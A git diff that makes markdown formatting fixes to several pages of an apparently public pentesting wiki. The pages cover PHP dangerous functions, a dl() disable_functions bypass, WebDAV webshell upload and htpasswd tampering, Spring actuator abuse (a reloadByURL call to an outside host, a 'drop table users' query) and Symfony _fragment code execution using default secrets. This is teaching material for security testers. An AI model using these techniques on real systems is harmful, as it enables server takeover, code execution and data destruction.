+**posix\_setuid**
 
 ### Filesystem Functions
 
-According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow_url_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
+According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
 
 **Open filesystem handler**
 
@@ -696,7 +696,7 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
 **tmpfile**\
 **bzopen**\
 **gzopen**\
-**SplFileObject**->\__construct
+**SplFileObject**->\_\_construct
 
 **Write to filesystem (partially in combination with reading)**
 
@@ -704,19 +704,19 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
 **chmod**\
 **chown**\
 **copy**\
-**file_put_contents**\
+**file\_put\_contents**\
 **lchgrp**\
 **lchown**\
 **link**\
 **mkdir**\
-**move_uploaded_file**\
+**move\_uploaded\_file**\
 **rename**\
 **rmdir**\
 **symlink**\
 **tempnam**\
 **touch**\
 **unlink**\
-**imagepng  **- 2nd parameter is a path.\
+**imagepng**  - 2nd parameter is a path.\
 **imagewbmp** - 2nd parameter is a path.\
 **image2wbmp** - 2nd parameter is a path.\
 **imagejpeg** - 2nd parameter is a path.\
@@ -725,14 +725,14 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
 **imagegd** - 2nd parameter is a path.\
 **imagegd2** - 2nd parameter is a path.\
 **iptcembed**\
-**ftp_get**\
-**ftp_nb_get**\
+**ftp\_get**\
+**ftp\_nb\_get**\
 **scandir**
 
 **Read from filesystem**
 
-**file_exists**\
-**-- file_get_contents**\
+**file\_exists**\
+**-- file\_get\_contents**\
 **file**\
 **fileatime**\
 **filectime**\
@@ -744,17 +744,17 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
 **filesize**\
 **filetype**\
 **glob**\
-**is_dir**\
-**is_executable**\
-**is_file**\
-**is_link**\
-**is_readable**\
-**is_uploaded_file**\
-**is_writable**\
-**is_writeable**\
+**is\_dir**\
+**is\_executable**\
+**is\_file**\
+**is\_link**\
+**is\_readable**\
+**is\_uploaded\_file**\
+**is\_writable**\
+**is\_writeable**\
 **linkinfo**\
 **lstat**\
-**parse_ini_file**\
+**parse\_ini\_file**\
 **pathinfo**\
 **readfile**\
 **readlink**\
@@ -769,18 +769,18 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
 **imagecreatefromwbmp**\
 **imagecreatefromxbm**\
 **imagecreatefromxpm**\
-**ftp_put**\
-**ftp_nb_put**\
-**exif_read_data**\
-**read_exif_data**\
-**exif_thumbnail**\
-**exif_imagetype**\
-**hash_file**\
-**hash_hmac_file**\
-**hash_update_file**\
+**ftp\_put**\
+**ftp\_nb\_put**\
+**exif\_read\_data**\
+**read\_exif\_data**\
+**exif\_thumbnail**\
+**exif\_imagetype**\
+**hash\_file**\
+**hash\_hmac\_file**\
+**hash\_update\_file**\
 **md5\_file**\
 **sha1\_file**\
-**-- highlight_file**\
-**-- show_source**\
-**php_strip_whitespace**\
-**get_meta_tags**
+**-- highlight\_file**\
+**-- show\_source**\
+**php\_strip\_whitespace**\
+**get\_meta\_tags**
diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
index 26515c7c..316fab85 100644
--- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
+++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
@@ -1,13 +1,13 @@
-# disable_functions bypass - dl function
+# disable\_functions bypass - dl function
 
 **`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.\
 However, it has some strict limitations:
 
-* The `dl` function must be **present **in the **environment **and **not disabled**
-* The PHP Extension** must be compiled with the same major version** (PHP API version) that the server is using (you can see this information in the output of phpinfo)
-* The PHP extension must be** located in the directory** that is **defined **by the **`extension_dir`** directive (you can see it in the output of phpinfo). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique).
+* The `dl` function must be **present** in the **environment** and **not disabled**
+* The PHP Extension **must be compiled with the same major version** (PHP API version) that the server is using (you can see this information in the output of phpinfo)
+* The PHP extension must be **located in the directory** that is **defined** by the **`extension_dir`** directive (you can see it in the output of phpinfo). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique).
 
-**If you meet these requirements, continue reading this post copied from **[**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/)** to learn how to bypass disable_functions**
+**If you meet these requirements, continue reading this post copied from** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **to learn how to bypass disable\_functions**
 
 When the admin was configuring the box he/she overlooked the [dl function](http://www.php.net/manual/en/function.dl.php) and didn't disable it since there was no mention of being able to execute system commands.\
 The [dl function](http://www.php.net/manual/en/function.dl.php) is used to loads PHP extensions when a script is executed.\
@@ -15,7 +15,7 @@ The [dl function](http://www.php.net/manual/en/function.dl.php) is used to loads
 (PHP extensions are written in C/C++ and are used to give PHP more functionality.)\
 \
 The attacker notices the function isn't disabled and sees potential and decides to create a PHP extension.\
-The attacker checks the version of PHP using a small script`<?php echo 'PHP Version is '.PHP_VERSION; ?>` (PHP_VERSION is a predefined constant that contains the version number of PHP.)\
+The attacker checks the version of PHP using a small script`<?php echo 'PHP Version is '.PHP_VERSION; ?>` (PHP\_VERSION is a predefined constant that contains the version number of PHP.)\
 \
 The attacker notes the version and downloads the tarball from the [PHP website](http://www.php.net/downloads.php), in this scenario the version is older than the current release so the attacker has to go to the [archive](http://museum.php.net).\
 \
@@ -174,7 +174,7 @@ Now the attacker uploads the newly created extension to the victim host.\
 \
 (NOTE: Major releases of PHP use different API versions, in order for you to be able to compile the extension on one host and upload it to another the API versions must match. This is why initially the same PHP version was installed on the attackers box. )\
 \
-In order to load an extension with the dl function the extension needs to be in the the extension directory which is defined by the extension_dir directive.\
+In order to load an extension with the dl function the extension needs to be in the the extension directory which is defined by the extension\_dir directive.\
 This can be a problem since it's less likely for the attacker to have write permissions in this directory, there is however a way to get passed this.\
 This problem has been discussed by developers on the dl function page within the notes section.\
 \
diff --git a/pentesting/pentesting-web/put-method-webdav.md b/pentesting/pentesting-web/put-method-webdav.md
index fa701e30..c11cc077 100644
--- a/pentesting/pentesting-web/put-method-webdav.md
+++ b/pentesting/pentesting-web/put-method-webdav.md
@@ -1,19 +1,19 @@
 # WebDav
 
-A **HTTP Server with WebDav** active is a server where you probably can** update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
+A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
 
-You should try to **upload **some **webshell **and **execute **it from the web server to take control over the server.\
-Usually, to **connect **a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth)** **_(Basic Auth)_.
+You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.\
+Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) **** _(Basic Auth)_.
 
 Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
 
 * **Upload** files with **executable extensions** (maybe it's not forbidden).
-* **Upload** files** without executable extensions** (like .txt) and try to **rename** the file (move) with an **executable extension**.
+* **Upload** files **without executable extensions** (like .txt) and try to **rename** the file (move) with an **executable extension**.
 * **Upload** files **without executable extensions** (like .txt) and try to **copy** the file (move) with **executable extension.**
 
 ## DavTest
 
-**Davtest **try to** upload several files with different extensions** and **check** if the extension is **executed**:
+**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
 
 ```bash
 davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
@@ -24,11 +24,11 @@ Output sample:
 
 ![](<../../.gitbook/assets/image (19).png>)
 
-This doesn't mean that **.txt **and **.html extensions are being executed**. This mean that you can **access this files** through the web.
+This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
 
 ## Cadaver
 
-You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move **or **delete**) **manually**.
+You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.
 
 ```
 cadaver <IP>
@@ -48,9 +48,9 @@ curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
 
 ## IIS5/6 WebDav Vulnerability
 
-This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename **files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed **as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
+This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
 
-Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed **(cadaver will said that the move action didn't work, but it did).
+Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
 
 ![](<../../.gitbook/assets/image (18).png>)
 
@@ -72,15 +72,15 @@ ServerAdmin webmaster@localhost
                 Require valid-user
 ```
 
-As you can see there is the files with the valid **credentials **for the **webdav **server: 
+As you can see there is the files with the valid **credentials** for the **webdav** server:&#x20;
 
 ```
 /etc/apache2/users.password
 ```
 
-Inside this type of files you will find the **username **and a **hash **of the password. These are the credentials the webdav server is using to authenticate users.
+Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
 
-You can try to **crack **them, or to **add more **if for some reason you wan to **access** the **webdav **server:
+You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
 
 ```bash
 htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
diff --git a/pentesting/pentesting-web/special-http-headers.md b/pentesting/pentesting-web/special-http-headers.md
index eb455a8d..496e16a2 100644
--- a/pentesting/pentesting-web/special-http-headers.md
+++ b/pentesting/pentesting-web/special-http-headers.md
@@ -56,7 +56,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 
 * **`X-Cache`** in the response may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached
 * **`Cache-Control`** indicates if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
-* &#x20;**`Vary`** is often used in the response to **indicate additional headers** that are treated as** part of the cache key** even if they are normally unkeyed.
+* &#x20;**`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed.
 * **`Age`** defines the times in seconds the object has been in the proxy cache.
 
 {% content-ref url="../../pentesting-web/cache-deception.md" %}
@@ -74,7 +74,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 
 * Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header**`Last-Modified`** contains a different time.
 * Conditional requests using **`If-Match`** and **`If-None-Match`** use an Etag value so the web server will send the content of the response if the data (Etag) has changed. The `Etag` is taken from the HTTP response.
-  * The **Etag **value is usually **calculated based **on the **content **of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1 **of **37 bytes**.
+  * The **Etag** value is usually **calculated based** on the **content** of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1** of **37 bytes**.
 
 ## Range requests
 
@@ -85,13 +85,13 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 
 ## Message body information
 
-* **`Content-Length`: **The size of the resource, in decimal number of bytes.
+* **`Content-Length`:** The size of the resource, in decimal number of bytes.
 * **`Content-Type`**: Indicates the media type of the resource
 * **`Content-Encoding`**: Used to specify the compression algorithm.
 * **`Content-Language`**: Describes the human language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language.
 * **`Content-Location`**: Indicates an alternate location for the returned data.
 
-From a pentest point of view this information is usually "useless", but if the resource is **protected **by a 401 or 403 and you can find some **way **to **get **this **info**, this could be **interesting. **\
+From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.** \
 ****For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests:
 
 * A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y`
@@ -103,7 +103,7 @@ From a pentest point of view this information is usually "useless", but if the r
 
 ## Controls
 
-* **`Allow`: **Lists the set of methods supported by a resource. `Allow: GET, POST, HEAD`
+* **`Allow`:** Lists the set of methods supported by a resource. `Allow: GET, POST, HEAD`
 * **`Expect`**: The **`Expect`** HTTP request header indicates expectations that need to be fulfilled by the server in order to properly handle the request.
   * No other expectations except `Expect: 100-continue` are specified currently.  Informs recipients that the client is about to send a (presumably large) message body in this request and wishes to receive a [`100`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/100) (Continue) interim response.
 
@@ -114,13 +114,13 @@ From a pentest point of view this information is usually "useless", but if the r
 
 ## Security Headers
 
-### Content Security Policy (CSP) <a href="csp" id="csp"></a>
+### Content Security Policy (CSP) <a href="#csp" id="csp"></a>
 
 {% content-ref url="../../pentesting-web/content-security-policy-csp-bypass.md" %}
 [content-security-policy-csp-bypass.md](../../pentesting-web/content-security-policy-csp-bypass.md)
 {% endcontent-ref %}
 
-### Trusted Types <a href="tt" id="tt"></a>
+### Trusted Types <a href="#tt" id="tt"></a>
 
 Trusted Types provide the tools to write, security review, and maintain applications free of DOM XSS. They can be enabled via [CSP](https://web.dev/security-headers/#csp) and make JavaScript code secure by default by limiting dangerous web APIs to only accept a special object—a Trusted Type.
 
@@ -151,7 +151,7 @@ const escaped = policy.createHTML('<img src=x onerror=alert(1)>');
 el.innerHTML = escaped;  // '&lt;img src=x onerror=alert(1)&gt;'
 ```
 
-### X-Content-Type-Options <a href="xcto" id="xcto"></a>
+### X-Content-Type-Options <a href="#xcto" id="xcto"></a>
 
 When a malicious HTML document is served from your domain (for example, if an image uploaded to a photo service contains valid HTML markup), some browsers will treat it as an active document and allow it to execute scripts in the context of the application, leading to a [cross-site scripting bug](https://www.google.com/about/appsecurity/learning/xss/).
 
@@ -161,7 +161,7 @@ When a malicious HTML document is served from your domain (for example, if an im
 X-Content-Type-Options: nosniff
 ```
 
-### X-Frame-Options <a href="xfo" id="xfo"></a>
+### X-Frame-Options <a href="#xfo" id="xfo"></a>
 
 If a malicious website can embed your site as an iframe, this may allow attackers to invoke unintended actions by the user with [clickjacking](https://portswigger.net/web-security/clickjacking). Also, in some cases [Spectre-type attacks](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)) give malicious websites a chance to learn about the contents of an embedded document.
 
@@ -173,7 +173,7 @@ If you need more granular control such as allowing only a specific origin to emb
 X-Frame-Options: DENY
 ```
 
-### Cross-Origin Resource Policy (CORP) <a href="corp" id="corp"></a>
+### Cross-Origin Resource Policy (CORP) <a href="#corp" id="corp"></a>
 
 An attacker can embed resources from another origin, for example from your site, to learn information about them by exploiting web-based [cross-site leaks](https://xsleaks.dev).
 
@@ -183,7 +183,7 @@ An attacker can embed resources from another origin, for example from your site,
 Cross-Origin-Resource-Policy: same-origin
 ```
 
-### Cross-Origin Opener Policy (COOP) <a href="coop" id="coop"></a>
+### Cross-Origin Opener Policy (COOP) <a href="#coop" id="coop"></a>
 
 An attacker's website can open another site in a popup window to learn information about it by exploiting web-based [cross-site leaks](https://xsleaks.dev). In some cases, this may also allow the exploitation of side-channel attacks based on [Spectre](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)).
 
@@ -193,7 +193,7 @@ The `Cross-Origin-Opener-Policy` header provides a way for a document to isolate
 Cross-Origin-Opener-Policy: same-origin-allow-popups
 ```
 
-### Cross-Origin Resource Sharing (CORS) <a href="cors" id="cors"></a>
+### Cross-Origin Resource Sharing (CORS) <a href="#cors" id="cors"></a>
 
 Unlike other items in this article, Cross-Origin Resource Sharing (CORS) is not a header, but a browser mechanism that requests and permits access to cross-origin resources.
 
@@ -208,7 +208,7 @@ Access-Control-Allow-Credentials: true
 [cors-bypass.md](../../pentesting-web/cors-bypass.md)
 {% endcontent-ref %}
 
-### Cross-Origin Embedder Policy (COEP) <a href="coep" id="coep"></a>
+### Cross-Origin Embedder Policy (COEP) <a href="#coep" id="coep"></a>
 
 To reduce the ability of [Spectre-based attacks](https://en.wikipedia.org/wiki/Spectre\_\(security\_vulnerability\)) to steal cross-origin resources, features such as `SharedArrayBuffer` or `performance.measureUserAgentSpecificMemory()` are disabled by default.
 
@@ -220,7 +220,7 @@ Use `Cross-Origin-Embedder-Policy: require-corp` when you want to enable [cross-
 Cross-Origin-Embedder-Policy: require-corp
 ```
 
-### HTTP Strict Transport Security (HSTS) <a href="hsts" id="hsts"></a>
+### HTTP Strict Transport Security (HSTS) <a href="#hsts" id="hsts"></a>
 
 Communication over a plain HTTP connection is not encrypted, making the transferred data accessible to network-level eavesdroppers.
 
diff --git a/pentesting/pentesting-web/spring-actuators.md b/pentesting/pentesting-web/spring-actuators.md
index 5def19dc..26644c84 100644
--- a/pentesting/pentesting-web/spring-actuators.md
+++ b/pentesting/pentesting-web/spring-actuators.md
@@ -1,6 +1,6 @@
 # Spring Actuators
 
-**Page copied from **[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)****
+**Page copied from** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)****
 
 ## Exploiting Spring Boot Actuators
 
@@ -32,7 +32,7 @@ If the Jolokia Library is in the target application classpath, it is automatical
 
 Again, most of the MBeans actions just reveal some system data, but one is particularly interesting:
 
-![reloadByURL](https://www.veracode.com/sites/default/files/exploiting_spring_boot_actuators_jolokia.png)
+![reloadByURL](https://www.veracode.com/sites/default/files/exploiting\_spring\_boot\_actuators\_jolokia.png)
 
 The '**reloadByURL**' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to:[**http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml**](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators#)
 
@@ -118,7 +118,7 @@ Using Spring Actuators, you can actually exploit this vulnerability even if you
 
 **spring.datasource.tomcat.validationQuery=drop+table+users** - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.
 
-![Exploiting Spring Boot Actuators Drop Table](https://www.veracode.com/sites/default/files/exploiting_spring_boot_actuators_drop_table.png)
+![Exploiting Spring Boot Actuators Drop Table](https://www.veracode.com/sites/default/files/exploiting\_spring\_boot\_actuators\_drop\_table.png)
 
 **spring.datasource.tomcat.url**=jdbc:hsqldb:[https://localhost:3002/xdb](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators#) - allows you to modify the current JDBC connection string.
 
@@ -128,7 +128,7 @@ The last one looks great, but the problem is when the application running the da
 
 The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally agains Mysql and it works like a charm.
 
-![Exploiting Spring Boot Actuators Max Active](https://www.veracode.com/sites/default/files/exploiting_spring_boot_actuators_max_active.png)
+![Exploiting Spring Boot Actuators Max Active](https://www.veracode.com/sites/default/files/exploiting\_spring\_boot\_actuators\_max\_active.png)
 
 Apart from that, there are other properties that look interesting, but, in practice, are not really useful:
 
diff --git a/pentesting/pentesting-web/symphony.md b/pentesting/pentesting-web/symphony.md
index 99e6d2d7..f2e58a9c 100644
--- a/pentesting/pentesting-web/symphony.md
+++ b/pentesting/pentesting-web/symphony.md
@@ -1,12 +1,12 @@
 # Symphony
 
-**This page was copied from **[**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)****
+**This page was copied from** [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)****
 
-## Introduction <a href="introduction" id="introduction"></a>
+## Introduction <a href="#introduction" id="introduction"></a>
 
 Since its creation in 2008, the use of the [Symfony](https://symfony.com) framework has been growing more and more in PHP based applications. It is now a core component of many well known CMSs, such as [Drupal](https://www.drupal.org), [Joomla!](https://www.joomla.org), [eZPlatform](https://ezplatform.com) (formerly eZPublish), or [Bolt](https://bolt.cm), and is often used to build custom websites.
 
-One of Symfony's built-in features, made to handle [ESI (Edge-Side Includes)](https://en.wikipedia.org/wiki/Edge_Side_Includes), is the [`FragmentListener` class](https://github.com/symfony/symfony/blob/5.1/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php). Essentially, when someone issues a request to `/_fragment`, this listener sets request attributes from given GET parameters. Since this allows to **run arbitrary PHP code** (_more on this later_), the request has to be signed using a HMAC value. This HMAC's secret cryptographic key is stored under a Symfony configuration value named `secret`.
+One of Symfony's built-in features, made to handle [ESI (Edge-Side Includes)](https://en.wikipedia.org/wiki/Edge\_Side\_Includes), is the [`FragmentListener` class](https://github.com/symfony/symfony/blob/5.1/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php). Essentially, when someone issues a request to `/_fragment`, this listener sets request attributes from given GET parameters. Since this allows to **run arbitrary PHP code** (_more on this later_), the request has to be signed using a HMAC value. This HMAC's secret cryptographic key is stored under a Symfony configuration value named `secret`.
 
 This configuration value, `secret`, is also used, for instance, to build CSRF tokens and remember-me tokens. Given its importance, this value must obviously be very random.
 
@@ -18,17 +18,17 @@ Furthermore, an attacker can escalate less-impactful vulnerabilities to either r
 
 In this blogpost, we'll describe how the secret can be obtained in various CMSs and on the base framework, and how to get code execution using said secret.
 
-## A little bit of history <a href="a-little-bit-of-history" id="a-little-bit-of-history"></a>
+## A little bit of history <a href="#a-little-bit-of-history" id="a-little-bit-of-history"></a>
 
 Being a modern framework, Symfony has had to deal with generating sub-parts of a request from its creation to our times. Before `/_fragment`, there was `/_internal` and `/_proxy`, which did essentially the same thing. It produced a lot of vulnerabilities through the years: [CVE-2012-6432](https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released#cve-2012-6432-code-execution-vulnerability-via-the-internal-routes), [CVE-2014-5245](https://symfony.com/blog/cve-2014-5245-direct-access-of-esi-urls-behind-a-trusted-proxy), and [CVE-2015-4050](https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access), for instance.
 
 Since Symfony 4, the secret is generated on installation, and the `/_fragment` page is disabled by default. One would think, therefore, that the conjunction of both having a weak `secret`, and enabled `/_fragment`, would be rare. It is not: many frameworks rely on old Symfony versions (even 2.x is very present still), and implement either a static `secret` value, or generate it poorly. Furthermore, many rely on ESI and as such enable the `/_fragment` page. Also, as we'll see, other lower-impact vulnerabilities can allow to dump the secret, even if it has been securely generated.
 
-## Executing code with the help of `secret` <a href="executing-code-with-the-help-of-secret" id="executing-code-with-the-help-of-secret"></a>
+## Executing code with the help of `secret` <a href="#executing-code-with-the-help-of-secret" id="executing-code-with-the-help-of-secret"></a>
 
 We'll first demonstrate how an attacker, having knowledge of the `secret` configuration value, can obtain code execution. This is done for the last `symfony/http-kernel` version, but is similar for other versions.
 
-### Using `/_fragment` to run arbitrary code <a href="using-_fragment-to-run-arbitrary-code" id="using-_fragment-to-run-arbitrary-code"></a>
+### Using `/_fragment` to run arbitrary code <a href="#using-_fragment-to-run-arbitrary-code" id="using-_fragment-to-run-arbitrary-code"></a>
 
 As mentioned before, we will make use of the `/_fragment` page.
 
@@ -97,7 +97,7 @@ _Calling system won't work every time: refer to the Exploit section for greater
 
 One problem remains: how does Symfony verify the signature of the request?
 
-### Signing the URL <a href="signing-the-url" id="signing-the-url"></a>
+### Signing the URL <a href="#signing-the-url" id="signing-the-url"></a>
 
 To verify the signature of an URL, an HMAC is computed against the _full_ URL. The obtained hash is then compared to the one specified by the user.
 
@@ -190,7 +190,7 @@ class UriSigner
 
 In short, Symfony extracts the `_hash` GET parameter, then reconstructs the full URL, for instance `https://symfony-site.com/_fragment?_path=controller%3d...%26argument1=test%26...`, computes an HMAC from this URL using the `secret` as key \[1], and compares it to the given hash value \[2]. If they don't match, a `AccessDeniedHttpException` exception is raised \[3], resulting in a `403` error.
 
-### Example <a href="example" id="example"></a>
+### Example <a href="#example" id="example"></a>
 
 To test this, let's setup a test environment, and extract the secret (in this case, randomly generated).
 
@@ -230,15 +230,15 @@ _RCE using fragment_
 
 ![1](https://www.ambionics.io/images/symfony-secret-fragment/1.png)
 
-## Finding secrets <a href="finding-secrets" id="finding-secrets"></a>
+## Finding secrets <a href="#finding-secrets" id="finding-secrets"></a>
 
 Again: all of this would not matter if secrets were not obtainable. Oftentimes, they are. We'll describe several ways of getting code execution without any prior knowledge.
 
-### Through vulnerabilities <a href="through-vulnerabilities" id="through-vulnerabilities"></a>
+### Through vulnerabilities <a href="#through-vulnerabilities" id="through-vulnerabilities"></a>
 
 Let's start with the obvious: using lower-impact vulnerabilities to obtain the secret.
 
-#### File read <a href="file-read" id="file-read"></a>
+#### File read <a href="#file-read" id="file-read"></a>
 
 Evidently, a file read vulnerability could be used to read the following files, and obtain `secret`:
 
@@ -247,17 +247,17 @@ Evidently, a file read vulnerability could be used to read the following files,
 
 _As an example, some Symfony debug toolbars allow you to read files._
 
-#### PHPinfo <a href="phpinfo" id="phpinfo"></a>
+#### PHPinfo <a href="#phpinfo" id="phpinfo"></a>
 
 On recent symfony versions (3.x), `secret` is stored in `.env` as `APP_SECRET`. Since it is then imported as an environment variable, they can be seen through a `phpinfo()` page.
 
-_Leaking APP_SECRET through phpinfo_
+_Leaking APP\_SECRET through phpinfo_
 
 ![2](https://www.ambionics.io/images/symfony-secret-fragment/2.png)
 
 This can most notably be done through Symfony's profiler package, as demonstrated by the screenshot.
 
-#### SSRF / IP spoofing (CVE-2014-5245) <a href="ssrf-ip-spoofing-cve-2014-5245" id="ssrf-ip-spoofing-cve-2014-5245"></a>
+#### SSRF / IP spoofing (CVE-2014-5245) <a href="#ssrf-ip-spoofing-cve-2014-5245" id="ssrf-ip-spoofing-cve-2014-5245"></a>
 
 The code behind `FragmentListener` has evolved through the years: up to version _2.5.3_, when the request came from a trusted proxy (read: `localhost`), it would be considered safe, and as such the hash would not be checked. An SSRF, for instance, can allow to immediately run code, regardless of having `secret` or not. This notably affects eZPublish up to 2014.7.
 
@@ -298,9 +298,9 @@ class FragmentListener implements EventSubscriberInterface
 
 Admittedly, all of those techniques require another vulnerability. Let's dive into an even better vector: default values.
 
-### Through default values <a href="through-default-values" id="through-default-values"></a>
+### Through default values <a href="#through-default-values" id="through-default-values"></a>
 
-#### Symfony <= 3.4.43: `ThisTokenIsNotSoSecretChangeIt` <a href="symfony-3443-thistokenisnotsosecretchangeit" id="symfony-3443-thistokenisnotsosecretchangeit"></a>
+#### Symfony <= 3.4.43: `ThisTokenIsNotSoSecretChangeIt` <a href="#symfony-3443-thistokenisnotsosecretchangeit" id="symfony-3443-thistokenisnotsosecretchangeit"></a>
 
 When setting up a Symfony website, the first step is to install the [symfony-standard](https://github.com/symfony/symfony-standard) skeleton. When installed, a prompt asks for some configuration values. By default, the key is `ThisTokenIsNotSoSecretChangeIt`.
 
@@ -310,17 +310,17 @@ _Installation of Symfony through composer_
 
 On later versions (4+), the secret key is generated securely.
 
-#### ezPlatform 3.x (latest): `ff6dc61a329dc96652bb092ec58981f7` <a href="ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7" id="ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7"></a>
+#### ezPlatform 3.x (latest): `ff6dc61a329dc96652bb092ec58981f7` <a href="#ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7" id="ezplatform-3x-latest-ff6dc61a329dc96652bb092ec58981f7"></a>
 
-[ezPlatform](https://ezplatform.com), the successor of [ezPublish](https://en.wikipedia.org/wiki/EZ_Publish), still uses Symfony. On Jun 10, 2019, a [commit](https://github.com/ezsystems/ezplatform/commit/974f2a70d9d0507ba7ca17226693b1a4967f23cf#diff-f579cccc964135c7d644c7b2d3b0d3ecR59) set the default key to `ff6dc61a329dc96652bb092ec58981f7`. Vulnerable versions range from 3.0-alpha1 to 3.1.1 (current).
